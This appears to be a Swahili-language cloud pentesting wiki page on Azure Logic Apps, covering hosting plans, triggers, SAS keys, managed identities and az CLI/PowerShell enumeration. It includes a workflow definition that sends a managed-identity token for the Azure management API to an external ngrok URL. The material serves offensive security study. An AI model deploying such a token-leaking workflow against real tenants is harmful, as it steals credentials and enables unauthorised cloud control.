Az - Logic Apps

Reading time: 15 minutes

Basic Information

Azure Logic Apps inaruhusu waendelezaji kuunda na kuendesha workflows zinazounganisha huduma mbalimbali, vyanzo vya data, na programu. Workflows hizi zimeundwa ili kujiendesha kwa mchakato wa biashara, kupanga kazi, na kufanya uunganisho wa data kati ya majukwaa tofauti.

Logic Apps inatoa mchoro wa kuona kuunda workflows zenye mifungamano mingi iliyojengwa awali, ambayo inafanya iwe rahisi kuungana na kuingiliana na huduma mbalimbali:

Hosting options

Kuna chaguzi kadhaa za kuhost:

• Consumption

• Multi-tenant: Hii inatoa rasilimali za kompyuta zinazoshirikiwa, inafanya kazi katika wingu la umma, na inafuata mfano wa bei kulingana na operesheni. Hii ni bora kwa kazi nyepesi na za gharama nafuu. Hii ndiyo tutakayoiita "Single Workflow".

• Standard

• Workflow Service Plan: Hii inatoa rasilimali za kompyuta zilizotengwa na uunganisho wa VNET kwa ajili ya mtandao na inatoza ada kwa kila mfano wa mpango wa huduma ya workflow. Inafaa kwa kazi zinazohitaji udhibiti zaidi.
• App Service Environment V3: Hii inatoa rasilimali za kompyuta zilizotengwa zikiwa na kutengwa kamili na uwezo wa kupanuka. Pia inajumuisha VNET kwa mtandao na inatumia mfano wa bei kulingana na mifano ya App Service ndani ya mazingira.
• Hybrid: Hii imeundwa kwa ajili ya usindikaji wa ndani na msaada wa multi-cloud. Inaruhusu rasilimali za kompyuta zinazodhibitiwa na mteja zikiwa na ufikiaji wa mtandao wa ndani na inatumia Kubernetes Event-Driven Autoscaling (KEDA). Inategemea Mazingira ya Programu ya Kontena.

"Single" Workflows / Consumption Plan

Workflow ni mfululizo wa hatua au kazi za kiotomatiki zilizopangwa ambazo zinafanya mchakato au lengo maalum. Inafafanua jinsi vitendo, hali, na maamuzi tofauti vinavyoshirikiana ili kufikia matokeo yanayotakiwa, ikipunguza operesheni na kupunguza juhudi za mikono.

Triggers & Actions

Triggers za workflow zinaonyesha wakati workflow inapaswa kuanza. Triggers zinaweza kuwa kiunganishi cha HTTP, ratiba, au matukio tofauti kutoka Azure au hata programu za nje.

Kila workflow ina actions tofauti. Actions hizi ni hatua ambazo workflow inafuata. Kulingana na action, vigezo tofauti vitapatikana kuviweka, kama:

• Connection name: Muunganisho wa kutumia ambao action itashirikiana nao.
• Authentication Type: Chaguzi tofauti ni Access Key, Microsoft Entra ID, uthibitishaji wa Integrated Service principal na Logic Apps Managed Identity.
• Kutoka kwa mtazamo wa Kusoma tu, data ya Authentication daima ni ya kuvutia kwani inaweza kuwa na taarifa nyeti.
• Kutoka kwa mtazamo wa Kuandika, data ya Authentication daima ni ya kuvutia kwani inaweza kuruhusu kutumia ruhusa za utambulisho zilizotolewa.
• ...

Actions pia zina settings mbalimbali, ambazo zinategemea action yenyewe. Baadhi ya mipangilio ya kawaida ni:

• Retry Policy: Inapangilia idadi ya majaribio na muda kati yao.
• Timeout: Inapanga muda wa juu ambao action inaweza kukimbia kabla ya kuisha.
• Run After: Inabainisha masharti ambayo yanapaswa kutimizwa kabla ya action kuendesha.
• Schema Validation: Inahakikisha data inayokuja inafuata muundo ulioainishwa.
• Networking: Inapangilia jinsi ya kudhibiti vichwa tofauti.
• Secure Inputs/Outputs: Hii itaficha data za ingizo/kuondoa kutoka kwa historia ya kukimbia.
• ...

Authorization Policies

Workflows hizi zinasaidia sera za uthibitishaji na Entra ID ili kulinda triggers za msingi wa ombi kwa kuhitaji tokeni halali ya ufikiaji. Tokeni hii lazima iwe na madai maalum:

• Issuer (iss) ili kuthibitisha mtoa huduma wa utambulisho
• Audience (aud) ili kuhakikisha tokeni inakusudiwa kwa Logic App
• Subject (sub) ili kubaini mpiga simu
• JWT ID (kitambulisho cha JSON Web Token)
• Custom Claim

Wakati ombi linapopokelewa, Logic Apps inathibitisha tokeni dhidi ya madai haya na inaruhusu utekelezaji tu ikiwa yanalingana na sera iliyowekwa. Hii inaweza kutumika kuruhusu mpangilio mwingine kuanzisha workflow au kukataa trigger kutoka vyanzo vingine, kwa mfano kuruhusu trigger tu ikiwa inatoka https://login.microsoftonline.com/.

Access Keys

Workflows zinaunda funguo 2 za ufikiaji zinapoundwa. Funguo hizi zinatumika kuthibitisha na kuidhinisha maombi kwa workflow. Funguo hizo zinatumika kuunda tokeni ya Shared Access Signature (SAS), ambayo inajumuishwa katika URL ya ombi.

Hivyo, wakati kiunganishi cha HTTP kinapoundwa, kiunganishi cha kipekee cha HTTP chenye saini ya SAS ambacho kinatoa ruhusa ya kuita workflow kinaundwa.

Funguo hizi zinaweza kuundwa upya na URL mpya ya SAS itaundwa kwa ajili ya triggers hizi, lakini maadili ya funguo haya hayawezi kufikiwa.

Mfano wa URL ya SAS ya kuanzisha trigger:

https://<region>.logic.azure.com:443/workflows/<workflow-id>/triggers/<trigger-name>/paths/invoke?api-version=<api-version>&sp=%2Ftriggers%2F<trigger-name>%2Frun&sv=<version>&sig=<signature>

Workflow Settings & Components

• Trigger access option: Hali hii inakuwezesha kupunguza ni nani anaweza kuanzisha au kuanzisha workflow yako. Chaguzi ni IP yoyote, Workflow nyingine pekee na Mipango maalum ya IP.
• Integration account: Unganisha workflow yako na Akaunti ya Uunganisho.
• High throughput: Ikiwa imewashwa, inaruhusu kushughulikia maombi zaidi kwa wakati mmoja haraka.
• Run history retention: Hii inaonyesha idadi ya siku za kuhifadhi historia ya kukimbia.
• API connections: Hii inaonyesha uhusiano tofauti wa API ambao workflow ina. Ndani ya kila moja ya uhusiano haya wana mali tofauti na uwezekano wa kuhariri uhusiano wa API ambapo aina ya Uthibitishaji inaweza kubadilishwa.
• History: Ina chaguo la kufikia history ya utekelezaji wa zamani na kupata data: Mipangilio, Matokeo, Parameta na Msimbo.
• Versions: Ina chaguo la kufikia versions tofauti za workflow, ambapo unaweza kuangalia msimbo na kubadilisha workflow ya sasa na toleo la zamani la hiyo.
• Managed Identities: Inawezekana kupewa utambulisho mmoja wa mfumo wa usimamizi na utambulisho wa mtumiaji wa server kwa workflow.

Leak MI access tokens

Hatua ya HTTP katika workflow inaweza kutumika kutuma data kwa wavuti ya nje. Katika Advanced parameters ya hatua ya HTTP, inawezekana kuweka Authentication Type kama Managed identity na kisha kuchagua Managed Identity iliyopewa kutumia (sistema au mtumiaji).

Zaidi ya hayo, inawezekana kuashiria katika Audience hadhira ya JWT iliyozalishwa, ambayo inaweza kuwa kwa mfano https://management.azure.com/ ili kuwa na uwezo wa kutumia token iliyozalishwa kufikia Azure management API.

Huu ni msimbo wa workflow unaoonyesha kiungo cha HTTP na kisha unatumia hatua ya HTTP kuvuja token ya ufikiaji kwa URL iliyowekwa (ngrok katika kesi hii):

{
"definition": {
"$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
"contentVersion": "1.0.0.0",
"triggers": {
"When_a_HTTP_request_is_received": {
"type": "Request",
"kind": "Http"
}
},
"actions": {
"HTTP": {
"runAfter": {},
"type": "Http",
"inputs": {
"uri": "https://22b6-81-33-70-107.ngrok-free.app",
"method": "GET",
"authentication": {
"type": "ManagedServiceIdentity",
"audience": "https://management.azure.com/"
}
},
"runtimeConfiguration": {
"contentTransfer": {
"transferMode": "Chunked"
}
}
}
},
"outputs": {},
"parameters": {
"$connections": {
"type": "Object",
"defaultValue": {}
}
}
},
"parameters": {
"$connections": {
"type": "Object",
"value": {}
}
}
}

Logic Apps / Mpango wa Kawaida

Tofauti na "Mifumo" ya Kipekee

Logic apps kimsingi hutumia Huduma ya Programu katika mandharinyuma ili kuhifadhi logic app ambayo inaweza kuhifadhi mifumo kadhaa. Hii ina maana kwamba logic app itakuwa na vipengele vyote vya Huduma ya Programu na ya "Mifumo" ya Kipekee.

Baadhi ya vipengele muhimu ni:

• Mpango wa Huduma ya Programu: Logic Apps katika mpango wa Kawaida zinahifadhiwa kwenye Mpango wa Huduma ya Programu hivyo inawezekana kutumia vipengele vyote vya Huduma ya Programu kama:
• Vikwazo vya Mtandao: Onyesha kutoka wapi inapatikana.
• Kituo cha Utekelezaji: Teua kutoka kwa majukwaa ya nje kama Github, Bitbucket, Azure Repos, Git ya Nje na Git ya Mitaa.
• Upatikanaji wa FTP: Inawezekana kufikia faili za Logic App kupitia FTP.
• Akaunti ya Hifadhi: Programu ya huduma inatumia akaunti ya hifadhi kuhifadhi taarifa.
• Mabadiliko ya Mazingira na Mipangilio ya Programu: Inawezekana kusanidi mabadiliko ya mazingira na mipangilio ya programu (na kupata taarifa nyeti kama funguo za ufikiaji kwa akaunti ya hifadhi).
• ...
• Parameta: Parameta zinakuwezesha kudhibiti thamani zinazobadilika kati ya maendeleo, mtihani, na uzalishaji. Hii inakuwezesha kubuni mifumo kwanza, kisha kurekebisha mipangilio maalum ya mazingira kwa urahisi baadaye.
• Rasilimali Maalum: Logic Apps katika mpango wa Kawaida zina rasilimali maalum.
• Mifumo Mingi: Inaruhusu kuunda mifumo mingi.

Kwa maelezo zaidi kuhusu Huduma za Programu angalia:

Az - Azure App Services

Uhesabu

# List
az logic workflow list --resource-group <ResourceGroupName>
# Get info
az logic workflow show --name <LogicAppName> --resource-group <ResourceGroupName>

# Get details of a specific Logic App workflow, including its connections and parameters
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}?api-version=2016-10-01&$expand=connections.json,parameters.json" \
--headers "Content-Type=application/json"

# Get details about triggers for a specific Logic App
az rest --method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers?api-version=2016-06-01"

# Get the callback URL for a specific trigger in a Logic App
az rest --method POST \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/listCallbackUrl?api-version=2016-06-01"

# Get the history of a specific trigger in a Logic App
az rest --method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/histories?api-version=2016-06-01"

# List all runs of a specific Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# Get all actions within a specific run of a Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs/{runName}/actions?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# List all versions of a specific Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# Get details of a specific version of a Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions/{versionName}?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# List all Logic Apps in the specified resource group
az logicapp list --resource-group <ResourceGroupName>

# Show detailed information about a specific Logic App
az logicapp show --name <LogicAppName> --resource-group <ResourceGroupName>

# List all application settings for a specific Logic App
az logicapp config appsettings list --name <LogicAppName> --resource-group <ResourceGroupName>

# Get a Parameters from an Azure App Service using Azure REST API
az rest --method GET --url "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{app-service-name}/hostruntime/admin/vfs/parameters.json?api-version=2018-11-01&relativepath=1"

# Get webhook-triggered workflows from an Azure Logic App using Azure REST API
az rest --method GET --url "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{logic-app-name}/hostruntime/runtime/webhooks/workflow/api/management/workflows?api-version=2018-11-01"

# Get workflows from an Azure Logic App using Azure REST API
az rest --method GET --url "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{logic-app-name}/workflows?api-version=2018-11-01"

# Get details of a specific workflow including its connections and parameters in Azure Logic Apps using Azure REST API
az rest --method GET --uri "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{logic-app-name}/workflows/{workflow-name}?api-version=2018-11-01&\$expand=connections.json,parameters.json"

Get-Command -Module Az.LogicApp

# List
Get-AzLogicApp -ResourceGroupName <ResourceGroupName>
# Get info
Get-AzLogicApp -ResourceGroupName <ResourceGroupName> -Name <LogicAppName>

# Get details of a specific Logic App workflow run action
Get-AzLogicAppRunAction -ResourceGroupName "<ResourceGroupName>" -Name "<LogicAppName>" -RunName "<RunName>"

# Get the run history for a specific Logic App
Get-AzLogicAppRunHistory -ResourceGroupName "<ResourceGroupName>" -Name "<LogicAppName>"

# Get details about triggers for a specific Logic App
Get-AzLogicAppTrigger -ResourceGroupName "<ResourceGroupName>" -Name "<LogicAppName>"

# Get the callback URL for a specific trigger in a Logic App
Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "<ResourceGroupName>" -LName "<LogicAppName>" -TriggerName "<TriggerName>"

# Get the history of a specific trigger in a Logic App
Get-AzLogicAppTriggerHistory -ResourceGroupName "<ResourceGroupName>" -Name "<LogicAppName>" -TriggerName "<TriggerName>"

Akaunti za Uunganisho

Akaunti za Uunganisho, ni kipengele cha Azure Logic Apps. Akaunti za Uunganisho zinatumika kuwezesha uunganisho wa kiwango cha biashara kwa kuwezesha uwezo wa juu wa B2B, kama vile EDI, AS2, na usimamizi wa muundo wa XML. Akaunti za Uunganisho ni kontena katika Azure ambazo zinahifadhi vitu vifuatavyo vinavyotumika kwa Logic Apps:

• Mifano: Simamia mifano ya XML kwa ajili ya kuthibitisha na kushughulikia ujumbe katika akaunti yako ya uunganisho.
• Ramani: Sanidi mabadiliko yanayotegemea XSLT kubadilisha muundo wa data ndani ya mifumo yako ya uunganisho.
• Mkusanyiko: Simamia mkusanyiko wa akaunti za uunganisho ili kuboresha mantiki na usindikaji wa data.
• Vyeti: Shughulikia vyeti kwa ajili ya kuficha na kusaini ujumbe, kuhakikisha mawasiliano salama.
• Washirika: Simamia taarifa za washirika wa biashara kwa ajili ya shughuli za B2B, kuwezesha uunganisho usio na mshono.
• Makubaliano: Sanidi sheria na mipangilio ya kubadilishana data na washirika wa biashara (kwa mfano, EDI, AS2).
• Mipangilio ya Kundi: Simamia mipangilio ya usindikaji wa kundi ili kuunganisha na kushughulikia ujumbe kwa ufanisi.
• RosettaNet PIP: Sanidi Mchakato wa Kiolesura cha Washirika wa RosettaNet (PIPs) kwa ajili ya kuweka kiwango cha mawasiliano ya B2B.

Uhesabuji

# Integration account
az logic integration-account list --resource-group <resource-group-name>
az logic integration-account show --resource-group <resource-group-name> --name <integration-account-name>
az logic integration-account list-callback-url --resource-group <resource-group-name> --integration-account-name <integration-account-name>

# Batch-configuration
az logic integration-account batch-configuration list \
--resource-group <resource-group-name> \
--integration-account-name <integration-account-name>

az logic integration-account batch-configuration show \
--resource-group <resource-group-name> \
--integration-account-name <integration-account-name> \
--batch-configuration-name <batch-configuration-name>

# Map
az logic integration-account map list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account map show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--map-name <map-name>

# Partner
az logic integration-account partner list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account partner show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--name <partner-name>

# Session
az logic integration-account session list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account session show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--name <session-name>

# Assembly
# Session
az logic integration-account assembly list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account assembly show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--assembly-artifact-name <assembly-name>

Get-Command -Module Az.LogicApp

# Retrieve details of an integration account
Get-AzIntegrationAccount -ResourceGroupName <resource-group-name> -Name <integration-account-name>

# Retrieve the callback URL of an integration account
Get-AzIntegrationAccountCallbackUrl -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name>

# Retrieve details of a specific agreement in an integration account
Get-AzIntegrationAccountAgreement -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <agreement-name>

# Retrieve details of a specific assembly in an integration account
Get-AzIntegrationAccountAssembly -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <assembly-name>

# Retrieve details of a specific batch configuration in an integration account
Get-AzIntegrationAccountBatchConfiguration -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <batch-configuration-name>

# Retrieve details of a specific certificate in an integration account
Get-AzIntegrationAccountCertificate -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <certificate-name>

# Retrieve details of a specific map in an integration account
Get-AzIntegrationAccountMap -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <map-name>

# Retrieve details of a specific partner in an integration account
Get-AzIntegrationAccountPartner -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <partner-name>

# Retrieve details of a specific schema in an integration account
Get-AzIntegrationAccountSchema -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <schema-name>

Kuinua Mamlaka

Kama ilivyo kwa logic apps privesc:

Az - Logic Apps Privesc

Baada ya Kutekeleza

Az - Logic Apps Post Exploitation

Kudumu

Az - Logic Apps Persistence